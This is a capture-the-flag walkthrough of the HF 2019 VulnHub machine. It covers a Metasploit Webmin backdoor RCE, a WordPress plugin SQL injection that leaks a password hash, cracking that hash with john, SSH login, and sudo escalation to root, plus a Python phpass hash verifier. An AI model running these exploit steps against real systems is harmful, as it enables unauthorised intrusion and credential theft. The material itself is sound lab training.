The machine was part of my workshop for Hacker Fest 2019 at Prague. The difficulty level of this VM is very “very easy”. There are two paths to exploit it. There are no intentional rabbit holes. There is a “[retracted]” injection (exploit is part of MSF). Recovered credentials (username + hash) can be cracked by John and the rockyou.txt wordlist. A low-priv shell can be gained through the MSF exploit or by trying the credentials against “[retracted]”. Priv. esc. is simply done by “[retracted]”.
Url: HF VulnHub
Author: Martin Haller
First, a netdiscover scan reveals the target's address on the network:
netdiscover -i eth1
Then an nmap scan:
nmap -p- -A 192.168.56.112
The port scan reveals ports 21 (FTP), 22 (SSH) and 10000, which appears to be hosting Webmin. I will attempt to connect via FTP as the anonymous user. This was an extremely easy way to gain access to all of the WordPress website's files; however, I will be exploring other methods which require more exploitation.
Some simple enumeration and an understanding of back-end web apps will get you the right information.
Some research shows a Webmin 1.920 vulnerability. I use searchsploit to find these vulnerabilities. I am particularly interested in the Unauthenticated Remote Code Execution.
On the Metasploit console, we use the Webmin exploit and fill out the necessary options as demonstrated below:
msfconsole
use exploit/linux/http/webmin_backdoor
show options
set rhosts 192.168.56.112
set ssl true
set lhost 192.168.56.101
The exploit is ready to go.
Another attack vector is the WordPress site on port 80.
WPScan will be used to find any vulnerabilities and possible users on the website. Note that you need a WPScan API token (available from the WPScan site) to see the vulnerability data; pass it with --api-token.
wpscan --url http://192.168.56.112/ -e vp,u --api-token <YOUR_TOKEN>
After some research, the Unauthenticated SQL Injection vulnerability seems like the best route to go down. There is a Metasploit module for this.
Something else to note is the username ‘webmaster’ found on the WordPress site.
msfconsole
use auxiliary/admin/http/wp_google_maps_sqli
show options
set RHOSTS 192.168.56.112
The module has been correctly set up. Run it.
A hash value has been returned with the correct username that was found before on the WPScan results.
192.168.56.112:80 - Found webmaster $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1 [email protected]
Let’s ask our friend John to crack it, using rockyou.txt as the wordlist. The hash must be written with single quotes, otherwise the shell expands $P and $Bsq… as variables and the file ends up with a mangled hash:
echo '$P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1' > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
The password “kittykat1” has been returned.
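The reason John gets through this so quickly is the hash format itself: the $P$ prefix marks a phpass “portable” hash, which WordPress still stores by default. It is salted MD5 iterated 2^n times, with n encoded in the character after $P$ (here “B”, so 8192 rounds), an 8-character salt, and a 22-character digest in phpass’s own base64 alphabet. The following is an added example, not code from the walkthrough or from WordPress: it parses the hash recovered above and verifies a candidate password against it the same way WordPress does at login. The names ITOA64, parse_phpass, phpass_hash and verify are mine.

```python
import hashlib
import hmac

# phpass portable hash (WordPress wp_users.user_pass): salted MD5, 2**n rounds. n=13 here is cheap for john.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
PAGE_HASH = "$P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1"  # hash recovered via the SQL injection step above

def parse_phpass(setting: str) -> dict:
    """Split a $P$/$H$ hash into count exponent, salt and digest; raise on malformed input."""
    if len(setting) != 34 or setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("iteration count out of range")
    return {"count_log2": count_log2, "salt": setting[4:12], "digest": setting[12:]}

def _encode64(data: bytes, count: int) -> str:
    """phpass's own base64 variant (not RFC 4648), transcribed from the PHP reference."""
    out, i = [], 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def phpass_hash(password: str, salt: str, count_log2: int = 13) -> str:
    """MD5(salt+pw), then 2**count_log2 rounds of MD5(h+pw); output '$P$' + count char + salt + digest."""
    pw = password.encode()
    h = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):
        h = hashlib.md5(h + pw).digest()
    return "$P$" + ITOA64[count_log2] + salt + _encode64(h, 16)

def verify(password: str, setting: str) -> bool:
    """Recompute with the stored salt and count, then compare digests in constant time."""
    f = parse_phpass(setting)
    return hmac.compare_digest(phpass_hash(password, f["salt"], f["count_log2"])[12:], f["digest"])
```

verify("kittykat1", PAGE_HASH) performs the same check WordPress runs at login; the 8192-round MD5 loop is why a wordlist attack on such hashes finishes in seconds, and why bcrypt or Argon2 is the defensive fix.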
Let’s try to connect via SSH, entering the password “kittykat1” when prompted:
ssh webmaster@192.168.56.112
We are logged in as webmaster. Check the sudo privileges with the following command:
sudo -l
This user is effectively already root, so let’s just switch to a root shell with the following:
And we are root.